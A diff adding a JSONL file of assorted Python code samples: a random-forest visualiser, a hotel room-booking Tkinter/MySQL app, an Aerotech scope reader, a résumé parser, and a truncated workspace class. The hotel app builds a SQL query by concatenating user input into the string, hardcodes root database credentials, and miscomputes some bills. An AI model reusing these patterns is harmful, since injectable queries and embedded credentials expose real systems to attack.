diff --git "a/637.jsonl" "b/637.jsonl" new file mode 100644--- /dev/null +++ "b/637.jsonl" @@ -0,0 +1,638 @@ +{"seq_id":"76661690","text":"from sklearn import datasets\nfrom sklearn.ensemble import RandomForestClassifier\nfrom IPython.display import Image\nfrom sklearn import tree\nimport pydotplus\nimport os\nos.environ[\"PATH\"] += os.pathsep + 'D:/Anaconda3/Library/bin/graphviz'\n\n# 仍然使用自带的iris数据\niris = datasets.load_iris()\nX = iris.data\ny = iris.target\n\n# 训练模型,限制树的最大深度4\nclf = RandomForestClassifier(n_estimators=10, max_depth=4) #默认生成10棵树\n#拟合模型\nclf.fit(X, y)\n\nEstimators = clf.estimators_\nfor index, model in enumerate(Estimators):\n filename = 'iris_' + str(index) + '.pdf'\n dot_data = tree.export_graphviz(model , out_file=None,\n feature_names=iris.feature_names,\n class_names=iris.target_names,\n filled=True, rounded=True,\n special_characters=True)\n graph = pydotplus.graph_from_dot_data(dot_data)\n # 使用ipython的终端jupyter notebook显示。\n Image(graph.create_png())\n graph.write_png(filename)","sub_path":"featureExtrator/test/rf_visiualization_example.py","file_name":"rf_visiualization_example.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"407722971","text":"import ddarray\n\na = ddarray.double_ddarray(2, 3)\nfor i in range(2):\n for j in range(3):\n ddarray.setitem(a, i, j, i + 1)\n\nprint (ddarray.calculate(a, 2, 3))\nfor i in range(2):\n\tfor j in range(3):\n\t\tprint(\"{} \".format(ddarray.getitem(a,i,j)))\nddarray.deleteddarray(a,2,3)","sub_path":"eureka/testeddarray.py","file_name":"testeddarray.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"428526779","text":"from tkinter import *\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import ttk\r\nimport random\r\nfrom time import strftime\r\nfrom datetime import datetime\r\nimport mysql.connector\r\nfrom tkinter import messagebox\r\n\r\nclass Roombooking:\r\n\r\n def __init__(self,root):\r\n self.root = root\r\n self.root.title(\"Hotel Management System\")\r\n self.root.geometry(\"1000x550+230+148\")\r\n\r\n self.var_contact=StringVar()\r\n self.var_checkin=StringVar()\r\n self.var_checkout=StringVar()\r\n self.var_roomtype=StringVar()\r\n self.var_roomavailable=StringVar()\r\n self.var_meal=StringVar()\r\n self.var_noofdays=StringVar()\r\n self.var_paidtax=StringVar()\r\n self.var_actualtotal=StringVar()\r\n self.var_total=StringVar()\r\n\r\n lbl_title=Label(self.root,text=\"Booking DETAILS\",font=(\"times new roman\",18,\"bold\"),bg=\"black\",fg=\"gold\",bd=4,relief=RIDGE)\r\n lbl_title.place(x=0,y=0,width=1000,height=50)\r\n\r\n img2=Image.open(r\"C:\\Users\\nisha\\OneDrive\\Desktop\\python\\Hotel Management dbms\\images\\logo.png\")\r\n img2=img2.resize((100,40),Image.ANTIALIAS)\r\n self.photoimg2=ImageTk.PhotoImage(img2)\r\n lblimg=Label(self.root,image=self.photoimg2,bd=2,relief=RIDGE)\r\n lblimg.place(x=5,y=2,width=100,height=40)\r\n\r\n labelframeleft=LabelFrame(self.root,bd=2,text=\"Roombooking DETAILS\",font=(\"times new roman\",12,\"bold\"),relief=RIDGE,padx=2)\r\n labelframeleft.place(x=5,y=50,width=405,height=450)\r\n\r\n lbl_cusr_contact=Label(labelframeleft,text=\"Customer Reference No\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lbl_cusr_contact.grid(row=0,column=0,sticky=W)\r\n enty_contact=ttk.Entry(labelframeleft,textvariable=self.var_contact,width=18,font=(\"times new roman\",11,\"bold\"))\r\n enty_contact.grid(row=0,column=1,sticky=W)\r\n\r\n btnFetchData=Button(labelframeleft,command=self.Fetch_contact,text=\"Fetch Data\",font=(\"times new roman\",7,\"bold\"),bg=\"black\",fg=\"gold\",width=7)\r\n btnFetchData.place(x=320,y=3)\r\n\r\n check_in_date=Label(labelframeleft,text=\"Check_in Date\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n check_in_date.grid(row=1,column=0,sticky=W)\r\n txtcheck_in_date=ttk.Entry(labelframeleft,textvariable=self.var_checkin,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtcheck_in_date.grid(row=1,column=1)\r\n\r\n lbl_Check_out=Label(labelframeleft,text=\"Check_out Date\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lbl_Check_out.grid(row=2,column=0,sticky=W)\r\n txt_Check_out=ttk.Entry(labelframeleft,textvariable=self.var_checkout,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txt_Check_out.grid(row=2,column=1)\r\n\r\n label_RoomType=Label(labelframeleft,text=\"Room Type\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n label_RoomType.grid(row=3,column=0,sticky=W)\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select distinct RoomType from details\")\r\n ide=my_cursor.fetchall()\r\n combo_RoomType=ttk.Combobox(labelframeleft,textvariable=self.var_roomtype,font=(\"times new roman\",11,\"bold\"),width=18,state=\"readonly\")\r\n combo_RoomType[\"value\"]=ide\r\n combo_RoomType.current(1)\r\n combo_RoomType.grid(row=3,column=1)\r\n btnFetchData=Button(labelframeleft,command=self.Fetch_room,text=\"Fetch Data\",font=(\"times new roman\",7,\"bold\"),bg=\"black\",fg=\"gold\",width=7)\r\n btnFetchData.place(x=320,y=103)\r\n\r\n lblRoomAvailable=Label(labelframeleft,text=\"Available Room\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblRoomAvailable.grid(row=4,column=0,sticky=W)\r\n txtRoomAvailable=ttk.Entry(labelframeleft,textvariable=self.var_roomavailable,width=25,font=(\"times new roman\",11,\"bold\"),state=\"readonly\")\r\n txtRoomAvailable.grid(row=4,column=1)\r\n\r\n lblMeal=Label(labelframeleft,text=\"Meal\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblMeal.grid(row=5,column=0,sticky=W)\r\n txtMeal=ttk.Entry(labelframeleft,textvariable=self.var_meal,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtMeal.grid(row=5,column=1)\r\n\r\n lblNoOfDays=Label(labelframeleft,text=\"No Of Days\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblNoOfDays.grid(row=6,column=0,sticky=W)\r\n txtNoOfDays=ttk.Entry(labelframeleft,textvariable=self.var_noofdays,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtNoOfDays.grid(row=6,column=1)\r\n\r\n lblNoOfDays=Label(labelframeleft,text=\"Tax Paid\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblNoOfDays.grid(row=7,column=0,sticky=W)\r\n txtNoOfDays=ttk.Entry(labelframeleft,textvariable=self.var_paidtax,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtNoOfDays.grid(row=7,column=1)\r\n\r\n lblNoOfDays=Label(labelframeleft,text=\"Sub Total\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblNoOfDays.grid(row=8,column=0,sticky=W)\r\n txtNoOfDays=ttk.Entry(labelframeleft,textvariable=self.var_actualtotal,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtNoOfDays.grid(row=8,column=1)\r\n\r\n lblTotal=Label(labelframeleft,text=\"Total\",font=(\"times new roman\",11,\"bold\"),padx=2,pady=6)\r\n lblTotal.grid(row=9,column=0,sticky=W)\r\n txtTotal=ttk.Entry(labelframeleft,textvariable=self.var_total,width=25,font=(\"times new roman\",11,\"bold\"))\r\n txtTotal.grid(row=9,column=1)\r\n\r\n btnBill=Button(labelframeleft,command=self.total,text=\"Bill\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnBill.grid(row=10,column=0,padx=1,sticky=W)\r\n\r\n btn_frame=Frame(labelframeleft,bd=2,relief=RIDGE)\r\n btn_frame.place(x=0,y=370,width=380,height=40)\r\n\r\n btnAdd=Button(btn_frame,command=self.add_data,text=\"Add\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnAdd.grid(row=0,column=0,padx=1)\r\n\r\n btnUpdate=Button(btn_frame,command=self.update,text=\"Update\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnUpdate.grid(row=0,column=1,padx=1)\r\n\r\n btnDelete=Button(btn_frame,command=self.mDelete,text=\"Delete\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnDelete.grid(row=0,column=2,padx=1)\r\n\r\n btnReset=Button(btn_frame,command=self.reset,text=\"Reset\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnReset.grid(row=0,column=3,padx=1)\r\n\r\n img3=Image.open(r\"C:\\Users\\nisha\\OneDrive\\Desktop\\python\\Hotel Management dbms\\images\\download (3).jfif\")\r\n img3=img3.resize((300,300),Image.ANTIALIAS)\r\n self.photoimg3=ImageTk.PhotoImage(img3)\r\n lblimg=Label(self.root,image=self.photoimg3,bd=2,relief=RIDGE)\r\n lblimg.place(x=750,y=55,width=300,height=300)\r\n\r\n Table_Frame=LabelFrame(self.root,bd=2,text=\"VIEW DETAILS & SEARCH SYSTEM\",font=(\"times new roman\",12,\"bold\"),relief=RIDGE,padx=2)\r\n Table_Frame.place(x=415,y=280,width=585,height=220)\r\n\r\n lblSearchBy=Label(Table_Frame,text=\"Search By\",font=(\"times new roman\",11,\"bold\"),bg=\"red\",fg=\"white\")\r\n lblSearchBy.grid(row=0,column=0,sticky=W,padx=1)\r\n self.serch_var=StringVar()\r\n combo_Search=ttk.Combobox(Table_Frame,textvariable=self.serch_var,font=(\"times new roman\",11,\"bold\"),width=14,state=\"readonly\")\r\n combo_Search[\"value\"]=(\"Contact\",\"Room\")\r\n combo_Search.current(1)\r\n combo_Search.grid(row=0,column=1,padx=1)\r\n self.txt_search=StringVar()\r\n txtSearch=ttk.Entry(Table_Frame,width=18,textvariable=self.txt_search,font=(\"times new roman\",11,\"bold\"))\r\n txtSearch.grid(row=0,column=2,padx=1)\r\n\r\n btnSearch=Button(Table_Frame,command=self.search,text=\"Search\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnSearch.grid(row=0,column=3,padx=1)\r\n\r\n btnShowAll=Button(Table_Frame,command=self.fetch_data,text=\"Show All\",font=(\"times new roman\",11,\"bold\"),bg=\"black\",fg=\"gold\",width=9)\r\n btnShowAll.grid(row=0,column=4,padx=1)\r\n\r\n details_table=Frame(Table_Frame,bd=2,relief=RIDGE)\r\n details_table.place(x=0,y=50,width=555,height=160)\r\n\r\n scroll_x=ttk.Scrollbar(details_table,orient=HORIZONTAL)\r\n scroll_y=ttk.Scrollbar(details_table,orient=VERTICAL)\r\n\r\n self.room_table=ttk.Treeview(details_table,column=(\"contact\",\"checkin\",\"checkout\",\"roomtype\",\"roomavailable\",\"meal\",\"noofdays\",),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n scroll_x.pack(side=BOTTOM,fill=X)\r\n scroll_y.pack(side=RIGHT,fill=Y)\r\n scroll_x.config(command=self.room_table.xview)\r\n scroll_y.config(command=self.room_table.yview)\r\n\r\n self.room_table.heading(\"contact\",text=\"Ref\")\r\n self.room_table.heading(\"checkin\",text=\"Check-in\")\r\n self.room_table.heading(\"checkout\",text=\"Check-out\")\r\n self.room_table.heading(\"roomtype\",text=\"Room type\")\r\n self.room_table.heading(\"roomavailable\",text=\"Room No.\")\r\n self.room_table.heading(\"meal\",text=\"Meal\")\r\n self.room_table.heading(\"noofdays\",text=\"NoOfDays\")\r\n self.room_table[\"show\"]=\"headings\"\r\n self.room_table.column(\"contact\",width=100)\r\n self.room_table.column(\"checkin\",width=100)\r\n self.room_table.column(\"checkout\",width=100)\r\n self.room_table.column(\"roomtype\",width=100)\r\n self.room_table.column(\"roomavailable\",width=100)\r\n self.room_table.column(\"meal\",width=100)\r\n self.room_table.column(\"noofdays\",width=100)\r\n self.room_table.pack(fill=BOTH,expand=1)\r\n self.room_table.bind(\"\",self.get_cuersor)\r\n self.fetch_data()\r\n\r\n def add_data(self):\r\n if self.var_contact.get()==\"\" or self.var_checkin.get()==\"\":\r\n messagebox.showerror(\"ERROR\",\"All fields are required\",parent=self.root)\r\n else:\r\n try:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"insert into room values(%s,%s,%s,%s,%s,%s,%s)\",(self.var_contact.get(),self.var_checkin.get(),self.var_checkout.get(),self.var_roomtype.get(),self.var_roomavailable.get(),self.var_meal.get(),self.var_noofdays.get()))\r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n messagebox.showinfo(\"SUCCESS\",\"Booking added successfully\",parent=self.root)\r\n except Exception as es:\r\n messagebox.showwarning(\"WARNING\",f\"Some thing went wrong:{str(es)}\",parent=self.root)\r\n\r\n def fetch_data(self):\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from room\")\r\n rows=my_cursor.fetchall()\r\n if len(rows)!=0:\r\n self.room_table.delete(*self.room_table.get_children())\r\n for i in rows:\r\n self.room_table.insert(\"\",END,values=i)\r\n conn.commit()\r\n conn.close()\r\n\r\n def get_cuersor(self,event=\"\"):\r\n cusrsor_row=self.room_table.focus()\r\n content=self.room_table.item(cusrsor_row)\r\n row=content[\"values\"]\r\n self.var_contact.set(row[0]),\r\n self.var_checkin.set(row[1]),\r\n self.var_checkout.set(row[2]),\r\n self.var_roomtype.set(row[3]),\r\n self.var_roomavailable.set(row[4]),\r\n self.var_meal.set(row[5]),\r\n self.var_noofdays.set(row[6])\r\n\r\n def update(self):\r\n if self.var_contact.get()==\"\":\r\n messagebox.showerror(\"ERROR\",\"Mobile no. is required\",parent=self.root)\r\n else:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"update room set check_in=%s,check_out=%s,roomtype=%s,Room=%s,meal=%s,noOfdays=%s where Contact=%s\",(self.var_checkin.get(),self.var_checkout.get(),self.var_roomtype.get(),self.var_roomavailable.get(),self.var_meal.get(),self.var_noofdays.get(),self.var_contact.get()))\r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n messagebox.showinfo(\"SUCCESS\",\"Booking details updated successfully\",parent=self.root)\r\n\r\n def mDelete(self):\r\n mDelete=messagebox.askyesno(\"SURE?\",\"Delete Booking?\",parent=self.root)\r\n if mDelete>0:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=\"delete from room where Contact=%s AND check_in=%s AND check_out=%s AND Room=%s\"\r\n value=(self.var_contact.get(),self.var_checkin.get(),self.var_checkout.get(),self.var_roomavailable.get(),)\r\n my_cursor.execute(query,value)\r\n else:\r\n if not mDelete:\r\n return\r\n conn.commit()\r\n self.fetch_data()\r\n conn.close()\r\n\r\n def reset(self):\r\n self.var_contact.set(\"\"),\r\n self.var_checkin.set(\"\"),\r\n self.var_checkout.set(\"\"),\r\n self.var_roomtype.set(\"\"),\r\n self.var_roomavailable.set(\"\"),\r\n self.var_meal.set(\"\"),\r\n self.var_noofdays.set(\"\"),\r\n self.var_paidtax.set(\"\"),\r\n self.var_actualtotal.set(\"\"),\r\n self.var_total.set(\"\")\r\n\r\n\r\n def Fetch_room(self):\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n showDataframe=Frame(self.root,bd=4,relief=RIDGE,padx=2)\r\n showDataframe.place(x=435,y=55,width=300,height=180)\r\n value=(self.var_roomtype.get(),)\r\n query=\"select RoomNo from details where RoomType=%s\"\r\n my_cursor.execute(query,value)\r\n rows=my_cursor.fetchall()\r\n combo_RoomNo=ttk.Combobox(showDataframe,textvariable=self.var_roomavailable,font=(\"times new roman\",11,\"bold\"),width=25,state=\"readonly\")\r\n combo_RoomNo[\"value\"]=rows\r\n combo_RoomNo.current()\r\n combo_RoomNo.grid(row=4,column=1)\r\n\r\n\r\n def Fetch_contact(self):\r\n if self.var_contact.get()==\"\":\r\n messagebox.showerror(\"ERROR\",\"Ref no. is required\",parent=self.root)\r\n else:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Name from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n if row==None:\r\n messagebox.showerror(\"ERROR\",\"Ref no. not found\",parent=self.root)\r\n else:\r\n conn.commit()\r\n conn.close()\r\n showDataframe=Frame(self.root,bd=4,relief=RIDGE,padx=2)\r\n showDataframe.place(x=435,y=55,width=300,height=180)\r\n lblName=Label(showDataframe,text=\"Name\",font=(\"times new roman\",11,\"bold\"))\r\n lblName.place(x=0,y=0)\r\n lbl=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl.place(x=90,y=0)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Gender from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblGender=Label(showDataframe,text=\"Gender\",font=(\"times new roman\",11,\"bold\"))\r\n lblGender.place(x=0,y=25)\r\n lbl2=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl2.place(x=90,y=25)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Email from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblEmail=Label(showDataframe,text=\"Email\",font=(\"times new roman\",11,\"bold\"))\r\n lblEmail.place(x=0,y=50)\r\n lbl3=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl3.place(x=90,y=50)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Nationality from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblNationality=Label(showDataframe,text=\"Nationality\",font=(\"times new roman\",11,\"bold\"))\r\n lblNationality.place(x=0,y=75)\r\n lbl4=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl4.place(x=90,y=75)\r\n\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n query=(\"select Address from customer where Ref=%s\")\r\n value=(self.var_contact.get(),)\r\n my_cursor.execute(query,value)\r\n row=my_cursor.fetchone()\r\n lblAddress=Label(showDataframe,text=\"Address\",font=(\"times new roman\",11,\"bold\"))\r\n lblAddress.place(x=0,y=100)\r\n lbl5=Label(showDataframe,text=row,font=(\"times new roman\",11,\"bold\"))\r\n lbl5.place(x=90,y=100)\r\n\r\n def search(self):\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"root\",password=\"password\",database=\"sys\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from room where \"+str(self.serch_var.get())+\" LIKE '%\"+str(self.txt_search.get())+\"%'\")\r\n rows=my_cursor.fetchall()\r\n if len (rows)!=0:\r\n self.room_table.delete(*self.room_table.get_children())\r\n for i in rows:\r\n self.room_table.insert(\"\",END,values=i)\r\n conn.commit()\r\n conn.close()\r\n\r\n def total(self):\r\n inDate=self.var_checkin.get()\r\n outDate=self.var_checkout.get()\r\n inDate=datetime.strptime(inDate,\"%d/%m/%y\")\r\n outDate=datetime.strptime(outDate,\"%d/%m/%y\")\r\n self.var_noofdays.set(abs(outDate-inDate).days)\r\n\r\n if (self.var_meal.get()==\"Breakfast\" and self.var_roomtype.get()==\"Suite\"):\r\n q1=float(300)\r\n q2=float(12000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Lunch\" and self.var_roomtype.get()==\"Suite\"):\r\n q1=float(500)\r\n q2=float(12000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Dinner\" and self.var_roomtype.get()==\"Suite\"):\r\n q1=float(500)\r\n q2=float(12000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3*q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Lunch\" and self.var_roomtype.get()==\"Deluxe\"):\r\n q1=float(500)\r\n q2=float(8000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3+q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Breakfast\" and self.var_roomtype.get()==\"Deluxe\"):\r\n q1=float(300)\r\n q2=float(8000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3+q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Dinner\" and self.var_roomtype.get()==\"Deluxe\"):\r\n q1=float(500)\r\n q2=float(8000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3+q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Lunch\" and self.var_roomtype.get()==\"SuperDeluxe\"):\r\n q1=float(500)\r\n q2=float(10000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3+q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Dinner\" and self.var_roomtype.get()==\"SuperDeluxe\"):\r\n q1=float(500)\r\n q2=float(10000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3+q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\n elif (self.var_meal.get()==\"Breakfast\" and self.var_roomtype.get()==\"SuperDeluxe\"):\r\n q1=float(300)\r\n q2=float(10000)\r\n q3=float(self.var_noofdays.get())\r\n q4=float(q1+q2)\r\n q5=float(q3+q4)\r\n Tax=\"Rs.\"+str(\"%.2f\"%((q5)*0.1))\r\n ST=\"Rs.\"+str(\"%.2f\"%((q5)))\r\n TT=\"Rs.\"+str(\"%.2f\"%((q5)+((q5)*0.1)))\r\n self.var_paidtax.set(Tax)\r\n self.var_actualtotal.set(ST)\r\n self.var_total.set(TT)\r\n\r\nif __name__=='__main__':\r\n root=Tk()\r\n obj=Roombooking(root)\r\n root.mainloop()\r\n","sub_path":"room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":23461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"525327088","text":"import sys\nimport asyncio\nimport logging\n\nimport aerotech\n\n\nasync def scope_reader(host, comm_port, scope_port, *, acquire=False):\n comm = aerotech.EnsembleDoCommand(host, comm_port)\n await comm.check_program_status()\n\n if acquire:\n data_points = 1000\n await comm.scope_start(data_points=data_points, period_ms=10)\n await comm.scope_wait()\n\n scopereader = aerotech.ScopeDataReader(comm, host=host, port=scope_port)\n data = await scopereader.read_data()\n print('data', data)\n\n\nif __name__ == '__main__':\n try:\n host = sys.argv[1]\n except IndexError:\n host = 'moc-b34-mc07.slac.stanford.edu'\n # host = 'moc-b34-mc08.slac.stanford.edu'\n\n logging.getLogger('aerotech').setLevel(logging.DEBUG)\n\n logging.basicConfig(format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(scope_reader(host, comm_port=8000,\n scope_port=8001))\n loop.close()\n","sub_path":"aerotech/examples/read_scope_data.py","file_name":"read_scope_data.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"552861011","text":"import docx\nfrom PyPDF2 import PdfFileReader\nimport os\n\nclass RawText:\n def __init__(self, location):\n self.contents = [] # make this a dict key should be type+#\n self.wtf(location)\n\n def wtf(self, location):\n # divide location string, let's work with windows\n file = location.split('/')\n fin = len(file) - 1\n\n # find the TYPE\n name = file[fin].split('.')\n matype = name[len(name) - 1]\n\n if matype in ('doc', 'docx'):\n self.wordreader(location)\n elif matype == \"pdf\" :\n self.pdfreader(location)\n else:\n self.otherreader()\n\n def wordreader(self,location):\n word = docx.Document(location)\n\n for p in word.paragraphs:\n self.contents.append(p.text)\n\n def pdfreader(self,location):\n pdf = PdfFileReader(open(location, \"rb\"))\n length = pdf.numPages\n\n for i in range(0,length):\n self.contents.append(pdf.getPage(i).extractText())\n\n def otherreader(self):\n print(\"I was made by a bad programmer\")\n\n\nif __name__ == \"__main__\":\n PATH = os.getcwd()\n x = RawText(PATH+\"\\\\1Resume.docx\")\n print(x.contents)","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"341957275","text":"import logging\nfrom letter import Letter\nfrom slipnet import slipnet\n\n\nclass WorkspaceString(object):\n def __init__(self, s):\n self.string = s\n self.bonds = []\n self.objects = []\n self.letters = []\n self.length = len(s)\n self.intraStringUnhappiness = 0.0\n if not self.length:\n return\n position = 0\n from workspace import workspace\n\n for c in self.string.upper():\n value = ord(c) - ord('A')\n letter = Letter(self, position + 1, self.length)\n letter.workspaceString = self\n letter.addDescription(slipnet.objectCategory, slipnet.letter)\n letter.addDescription(slipnet.letterCategory,\n slipnet.letters[value])\n letter.describe(position + 1, self.length)\n workspace.buildDescriptions(letter)\n self.letters += [letter]\n position += 1\n\n def __repr__(self):\n return '' % self.string\n\n def __str__(self):\n return '%s with %d letters, %d objects, %d bonds' % (\n self.string, len(self.letters), len(self.objects), len(self.bonds))\n\n def log(self, heading):\n s = '%s: %s - ' % (heading, self)\n for l in self.letters:\n s += ' %s' % l\n s += '; '\n for o in self.objects:\n s += ' %s' % o\n s += '; '\n for b in self.bonds:\n s += ' %s' % b\n s += '.'\n logging.info(s)\n\n def __len__(self):\n return len(self.string)\n\n def __getitem__(self, i):\n return self.string[i]\n\n def updateRelativeImportance(self):\n \"\"\"Update the normalised importance of all objects in the string\"\"\"\n total = sum([o.rawImportance for o in self.objects])\n if not total:\n for o in self.objects:\n o.relativeImportance = 0.0\n else:\n for o in self.objects:\n logging.info('object: %s, relative: %d = raw: %d / total: %d',\n o, o.relativeImportance * 1000, 